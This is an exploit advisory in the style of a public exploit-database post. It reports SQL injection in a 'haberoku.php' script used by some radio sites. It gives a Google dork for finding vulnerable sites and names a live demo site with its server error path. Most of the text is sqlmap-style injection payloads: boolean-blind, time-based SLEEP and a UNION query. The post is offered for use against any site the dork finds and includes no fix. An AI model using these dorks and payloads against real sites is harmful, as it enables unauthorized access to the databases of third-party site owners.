Exploit Title :
# Author [ Discovered By ] : Prototyqe
# Team : Cyberizm Digital Security Army
# Date : 10/05/2019
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:"haberoku.php?id=" intext:"radyo"
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Dork : inurl:"haberoku.php?id=" intext:"radyo"
Demo web page :
http://www.radyoumut.co.uk/haberoku.php?id=123'
sql vul :
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/hisarfm/public_html/haberoku.php on line 117
/haberoku.php?id=[ SQL-İnjection]
payload
: Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=133 AND 8825=8825
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=133 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: id=133 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71767a7a71,0x7758786552774d4847497458736653556d4e415842494f74476d525a5449577a7057447156465270,0x7170787671),NULL,NULL,NULL,NULL,NULL,NULL-- ZLin